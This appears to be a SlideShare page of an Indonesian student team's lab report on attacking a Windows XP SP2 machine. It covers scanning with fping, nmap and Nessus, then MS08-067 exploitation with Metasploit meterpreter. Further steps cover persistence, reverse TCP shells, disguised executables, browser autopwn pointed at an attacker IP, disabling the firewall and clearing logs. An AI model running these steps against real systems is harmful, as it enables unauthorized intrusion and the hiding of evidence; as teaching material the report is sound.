SlideShare a Scribd company logo
Windows XP – Service Pack 2
Security Assessment
Tim :
1. Abdurrohman [11412033]
2. Rudin Alkrison [11412020]
3. Muchamad Taufiq [11412004]
4. Seto Juli Utomo [11412024]
5. Shandy Ismail [11412028]
STMIK WIDURI – TEKNIK INFORMATIKA
1. Install & Configuring Kalilinux (on VMWARE / Virtual Box)
2. Information Gathering
a. Host Scanning
fping -a -g 192.168.88.1 192.168.88.254 > host.txt
b. Port Scanning
nmap -iL host.txt –sS
c. Vulnerability Scanning
- Start nessus service
- Membuka nessus dari browser dengan alamat, https://localhost:8834
- Membuat policy profile , dapat memilih menggunakan scanner yang akan digunakan
- Pilih New Scan dan gunakan policy yang telah dibuat sebelumnya, masukkan juga host yang
akan di scan
- Hasil scan terlihat seperti gambar dibawah , di klik untuk detail
- Setelah dicek detail, dilihat target machine tersebut memiliki hole/vulnerability di port
mana
- Dapat terlihat bahwa ada vulnerability yang memungkinkan penyerang untuk
mengeksekusi kode pada port yang bermasalah
3. OS Based Vulnerability Assessment
- Untuk melakukan exploit kami menggunakan metasploit
- Pada console / terminal kita ketikkan msfconsole
- Berdasarkan hasil vulnerability dari nesus, dapat dicari di metasploit dengan kode ms08-
067
- Gunakan ms08_067_netapi
- Dan gunakan payload (payload di metasploit adalah opsi cara exploit melakukan control
target machine) windows/meterpreter/bind_tcp
- Ketik show options untuk melihat parameter yang akan digunakan
- Setelah semua sesuai jalankan command β€˜exploit’
- Setelah masuk melalui meterpreter(adalah extensible payload yang dinamik dan
mudah dalam pengelolannya), coba masujkkan beberapa command seperti getuid,
upload, download dll.
4. Maintaining Access
- Maintain akses diperlukan sebagai langkah, jika suatu saat target machine di firewall
- Untuk maintain akses dapat dilakukan dengan menggunakan meterpreter – run persistence,
dimana akan membuat target menjalankan suatu servicea setiap dia restart.
- Meterpreter – run persistence (set on boot)
- Jalankan multi/handler untuk membuat listening port dimana yang melakukan inisiasi
adalah target machine, bukan attacker machine sehingga firewall pun tidak akan melakukan
tindakan apapun.
- Yang kedua dapat menggunakan cara reserve TCP, pada dasarnya sama saja dengan
persistence pada meterpreter hanya saja menggunakan payload yang berbeda yaitu
menggunakan windows/shell/reverse_tcp
- Setelah β€˜.exe’ nya entah bagaimana cara nya agar file tersebut bisa di ambil dan dijalankan
oleh target, bisa dengan menyamarkan file tersebut dll.
5. Client Side Exploitation => Memanfaatkan celah yang dimiliki oleh user / pengguna, disaat
pengguna tersebut ceroboh dengan membuka file sembarangan yang mengakibatkan adanya
hole/vulnerability pada machine
a. Binary Payloads
ii. Sama seperti reverse tcp
b. Browser Autopwn
- Untuk browser autopwn , yaitu memanfaatkan kelemahan pada Browser yang
mengakibatkan target machine melakukan connect back atau reverse pada machine
attacker melalui browser
Running IE > Open attacker_IP
6. Other Task
a. Disable Firewall
b. Clear Log
7. Report
NO TASK RESULT
1 Information Gathering
Scanning Host
Scanning Port
Scanning Vulnerabilty
2 OS Assessment
Exploit Target Machine
3 Maintain Access
Connect Back – persistence
Connect Back – reverse tcp
4 Client Side Attacking
Binnary Payload
Browser Autopwn
5 Other Task
Disable Firewall
Clear Log
8. Role
NO TASK PIC
1 Information Gathering
Scanning Host Rudin
Scanning Port Seto
Scanning Vulnerabilty Shandy
2 OS Assessment
Exploit Target Machine Taufiq
3 Maintain Access
Connect Back – persistence Taufiq
Connect Back – reverse tcp Taufiq
4 Client Side Attacking
Binnary Payload Taufiq
Browser Autopwn Taufiq
5 Other Task
Disable Firewall Taufiq
Clear Log Taufiq
9. Preventive & Summary
c. Preventive
i. Rutin update dan patch OS dan AntiVirus
ii. Lebih bagus menggunakan Aplikasi firewall terpisah (3rd
party)
iii. Tidak sembarang membuka file (cek extension nya, dll)
iv. Menjadi user yang cerdas
d. Summary
v. Attacker dapat menyerang OS / Aplikasi dikarenakan ada nya hole security /
vulnerability
vi. Selain memanfaatkan OS/ Aplikasi yang vulnerable, juga memanfaatkan
kelemahan user sehingga menyebabkan OS/aplikasi tersebut menjadi
vulnerable

More Related Content

PDF
Exploit windows
DOCX
Tipe serangan pada website&webserver
DOC
Martin Mematikan Komputer Jarak Jauh
PDF
It audit tools
PDF
Tugas besar MK Keamanan Jaringan
PDF
Qmail P to V Migration
PPTX
Langkah - Langkah Instalasi Ubuntu
PPTX
Windows server 2008 (domain dan subdomain individu)
Exploit windows
Tipe serangan pada website&webserver
Martin Mematikan Komputer Jarak Jauh
It audit tools
Tugas besar MK Keamanan Jaringan
Qmail P to V Migration
Langkah - Langkah Instalasi Ubuntu
Windows server 2008 (domain dan subdomain individu)

Viewers also liked (20)

PPT
Iman kepada Nabi dan Rasul Allah SWT
PPTX
KWU (Bubur Kertas)
PPTX
Instalasi dan Konfigurasi Active Directory di Windows Server 2008
PPTX
RAN (Regional Area Network)
PDF
Dcn tester
PPTX
Langkah - Langkah Instalasi Windows XP
PPTX
Instalasi dan Konfigurasi DHCP Server di Windows Server 2008
PPTX
SAN (Storage Area Network)
PDF
Instalasi CentOS 6.4 Pada VMWare Workstation 10
PDF
Solusi Perhitungan VLSM Bumigora Computer Networking Competition 2014 - STMIK...
PDF
How to group policy windows 2008 r2
PPT
Rapidly deploying software
PDF
Solusi Soal Ujian Akhir Semester Praktikum Sistem Keamanan Jaringan 2013 2014
PDF
HTML Form
PDF
Solusi Tugas Studi Kasus IPTables Three-Legged Network Firewall
PDF
Konfigurasi Routing OSPF Di MikroTik
PPT
From VB Script to PowerShell
PPTX
Vdi in-a-box
PPTX
Windows Server 2008
PDF
Konfigurasi Routing Statik di MikroTik
Iman kepada Nabi dan Rasul Allah SWT
KWU (Bubur Kertas)
Instalasi dan Konfigurasi Active Directory di Windows Server 2008
RAN (Regional Area Network)
Dcn tester
Langkah - Langkah Instalasi Windows XP
Instalasi dan Konfigurasi DHCP Server di Windows Server 2008
SAN (Storage Area Network)
Instalasi CentOS 6.4 Pada VMWare Workstation 10
Solusi Perhitungan VLSM Bumigora Computer Networking Competition 2014 - STMIK...
How to group policy windows 2008 r2
Rapidly deploying software
Solusi Soal Ujian Akhir Semester Praktikum Sistem Keamanan Jaringan 2013 2014
HTML Form
Solusi Tugas Studi Kasus IPTables Three-Legged Network Firewall
Konfigurasi Routing OSPF Di MikroTik
From VB Script to PowerShell
Vdi in-a-box
Windows Server 2008
Konfigurasi Routing Statik di MikroTik
Ad

Similar to Assessment windows xp (16)

PPTX
05-Malicious Code (lama) pada keamanan sistem komputer.pptx
PDF
PPTX
Basic Metasploit
PDF
Liawati Nugraha Laporan Pentest_ver1.2.pdf
PDF
Modul metasploit
PDF
ETH-08. Gain Access Part 1 - Metasploit.pdf
PPTX
Ethical Hacking2
PDF
1. Menganalisis Kemungkinan Potensi Ancaman Dan Serangan Terhadap Keamanan Ja...
PPTX
Keamanan s&i
DOC
Jaringan berbasis sistem deteksi intrusi
PDF
Outline course Backtrak Pentest
PDF
02 teknik penyerangan
DOCX
Network Scanning & Network Probing
ODP
Seminar and Workshop Computer Security, BPPTIK Kominfo
PPTX
Network security
PDF
Materi Pelatihan analisa malware
05-Malicious Code (lama) pada keamanan sistem komputer.pptx
Basic Metasploit
Liawati Nugraha Laporan Pentest_ver1.2.pdf
Modul metasploit
ETH-08. Gain Access Part 1 - Metasploit.pdf
Ethical Hacking2
1. Menganalisis Kemungkinan Potensi Ancaman Dan Serangan Terhadap Keamanan Ja...
Keamanan s&i
Jaringan berbasis sistem deteksi intrusi
Outline course Backtrak Pentest
02 teknik penyerangan
Network Scanning & Network Probing
Seminar and Workshop Computer Security, BPPTIK Kominfo
Network security
Materi Pelatihan analisa malware
Ad

Recently uploaded (6)

PDF
CPOB,CPOBT,CPOKBSEDIAAN SEMI SOLID LIQUID
PDF
πŠπŸ‘πŒπ„ππŸ’ππ†πŸ’π πƒπˆ π“π€πˆππ€ππŸ—πŸ— π’πŸ‘ππ„π’πˆπŸ’π‹ πŸπŸŽπŸπŸ“
PPTX
Pembinaan-JF, (mediator hubungan industrial) 2025.pptx
PDF
GAME GACOR QUEEN OF BOUNTY – JACKPOT BESAR HARI INI DI KANCAH4D
PPTX
materi tentang mikrotik jaringan komputer
PDF
IdREN Multi Access Edge Computing dan bangun ruang
CPOB,CPOBT,CPOKBSEDIAAN SEMI SOLID LIQUID
πŠπŸ‘πŒπ„ππŸ’ππ†πŸ’π πƒπˆ π“π€πˆππ€ππŸ—πŸ— π’πŸ‘ππ„π’πˆπŸ’π‹ πŸπŸŽπŸπŸ“
Pembinaan-JF, (mediator hubungan industrial) 2025.pptx
GAME GACOR QUEEN OF BOUNTY – JACKPOT BESAR HARI INI DI KANCAH4D
materi tentang mikrotik jaringan komputer
IdREN Multi Access Edge Computing dan bangun ruang

Assessment windows xp

  • 1. Windows XP – Service Pack 2 Security Assessment Tim : 1. Abdurrohman [11412033] 2. Rudin Alkrison [11412020] 3. Muchamad Taufiq [11412004] 4. Seto Juli Utomo [11412024] 5. Shandy Ismail [11412028] STMIK WIDURI – TEKNIK INFORMATIKA
  • 2. 1. Install & Configuring Kalilinux (on VMWARE / Virtual Box) 2. Information Gathering a. Host Scanning fping -a -g 192.168.88.1 192.168.88.254 > host.txt b. Port Scanning nmap -iL host.txt –sS c. Vulnerability Scanning - Start nessus service
  • 3. - Membuka nessus dari browser dengan alamat, https://localhost:8834 - Membuat policy profile , dapat memilih menggunakan scanner yang akan digunakan
  • 4. - Pilih New Scan dan gunakan policy yang telah dibuat sebelumnya, masukkan juga host yang akan di scan - Hasil scan terlihat seperti gambar dibawah , di klik untuk detail
  • 5. - Setelah dicek detail, dilihat target machine tersebut memiliki hole/vulnerability di port mana - Dapat terlihat bahwa ada vulnerability yang memungkinkan penyerang untuk mengeksekusi kode pada port yang bermasalah
  • 6. 3. OS Based Vulnerability Assessment - Untuk melakukan exploit kami menggunakan metasploit - Pada console / terminal kita ketikkan msfconsole - Berdasarkan hasil vulnerability dari nesus, dapat dicari di metasploit dengan kode ms08- 067
  • 7. - Gunakan ms08_067_netapi - Dan gunakan payload (payload di metasploit adalah opsi cara exploit melakukan control target machine) windows/meterpreter/bind_tcp - Ketik show options untuk melihat parameter yang akan digunakan
  • 8. - Setelah semua sesuai jalankan command β€˜exploit’
  • 9. - Setelah masuk melalui meterpreter(adalah extensible payload yang dinamik dan mudah dalam pengelolannya), coba masujkkan beberapa command seperti getuid, upload, download dll. 4. Maintaining Access - Maintain akses diperlukan sebagai langkah, jika suatu saat target machine di firewall - Untuk maintain akses dapat dilakukan dengan menggunakan meterpreter – run persistence, dimana akan membuat target menjalankan suatu servicea setiap dia restart. - Meterpreter – run persistence (set on boot)
  • 10. - Jalankan multi/handler untuk membuat listening port dimana yang melakukan inisiasi adalah target machine, bukan attacker machine sehingga firewall pun tidak akan melakukan tindakan apapun.
  • 11. - Yang kedua dapat menggunakan cara reserve TCP, pada dasarnya sama saja dengan persistence pada meterpreter hanya saja menggunakan payload yang berbeda yaitu menggunakan windows/shell/reverse_tcp
  • 12. - Setelah β€˜.exe’ nya entah bagaimana cara nya agar file tersebut bisa di ambil dan dijalankan oleh target, bisa dengan menyamarkan file tersebut dll. 5. Client Side Exploitation => Memanfaatkan celah yang dimiliki oleh user / pengguna, disaat pengguna tersebut ceroboh dengan membuka file sembarangan yang mengakibatkan adanya hole/vulnerability pada machine a. Binary Payloads ii. Sama seperti reverse tcp b. Browser Autopwn - Untuk browser autopwn , yaitu memanfaatkan kelemahan pada Browser yang mengakibatkan target machine melakukan connect back atau reverse pada machine attacker melalui browser
  • 13. Running IE > Open attacker_IP
  • 14. 6. Other Task a. Disable Firewall
  • 16. 7. Report NO TASK RESULT 1 Information Gathering Scanning Host Scanning Port Scanning Vulnerabilty 2 OS Assessment Exploit Target Machine 3 Maintain Access Connect Back – persistence Connect Back – reverse tcp 4 Client Side Attacking Binnary Payload Browser Autopwn 5 Other Task Disable Firewall Clear Log 8. Role NO TASK PIC 1 Information Gathering Scanning Host Rudin Scanning Port Seto Scanning Vulnerabilty Shandy 2 OS Assessment Exploit Target Machine Taufiq 3 Maintain Access Connect Back – persistence Taufiq Connect Back – reverse tcp Taufiq 4 Client Side Attacking Binnary Payload Taufiq Browser Autopwn Taufiq 5 Other Task Disable Firewall Taufiq Clear Log Taufiq
  • 17. 9. Preventive & Summary c. Preventive i. Rutin update dan patch OS dan AntiVirus ii. Lebih bagus menggunakan Aplikasi firewall terpisah (3rd party) iii. Tidak sembarang membuka file (cek extension nya, dll) iv. Menjadi user yang cerdas d. Summary v. Attacker dapat menyerang OS / Aplikasi dikarenakan ada nya hole security / vulnerability vi. Selain memanfaatkan OS/ Aplikasi yang vulnerable, juga memanfaatkan kelemahan user sehingga menyebabkan OS/aplikasi tersebut menjadi vulnerable